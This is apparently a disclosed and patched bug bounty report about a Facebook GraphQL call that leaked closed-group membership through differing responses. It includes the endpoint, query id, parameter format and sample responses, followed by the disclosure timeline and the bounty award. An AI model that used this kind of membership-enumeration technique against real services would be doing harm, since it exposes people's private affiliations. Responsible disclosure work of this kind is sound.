A C

Published On: 01 Jun 2019

Determine members in a closed Facebook group

Privacy/Authentication
Facebook | IOS
---
HIGH VALID
Description

According to https://www.facebook.com/help/220336891328465, only current members can see the list of members in the closed group. It’s possible to bypass the privacy with a GraphQL API call. Due to different response, it's possible to infer if a user is a member of a closed group.

Impact

This bug could have allowed an attacker to determine members of a closed group.




Reproduction Steps

Step
1

HTTP POST

https://graph.facebook.com/graphql/

query_id = 2433256830023894

query_params = {"4":UserID,"11":GroupID}

Step
2

Try to fire the call, UserID=MemberID

Response

"adder_profile": {
"__typename": "User",
"name": "1",
"id": "1",
"profile_picture": {
"uri": "1"
}
}

Show Image

Step
3

Try to fire the call, UserID=Non-MemberID

Response

"adder_profile": null

 

Show Image

Step
4

As you can see, "adder_profile" could be indicator of group membership.

Videos

Timeline
.
A 01 May 2019

Initial Report

.
Facebook 04 May 2019

Need more information

.
A 04 May 2019

Sending additional information

.
Facebook 08 May 2019

Pre-triage Hi Richard, Thank you for your submission. We've managed to reproduce your report and will get back to you once we have had a chance to investi ... See More

.
Facebook 09 May 2019

Triaged Hi Richard, Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation. We will ... See More

.
Facebook 18 May 2019

Fixed Hi Richard, We have looked into this issue and believe that the vulnerability has been patched. Please let us know if you believe that the patch ... See More

.
A 18 May 2019

Confirmation

.
Facebook 19 May 2019

Bounty Awarded Hi Richard Cao, After reviewing this issue, we have decided to award you a bounty of $5000. Below is an explanation of the bounty amount. Facebo ... See More

VALID






Show All Images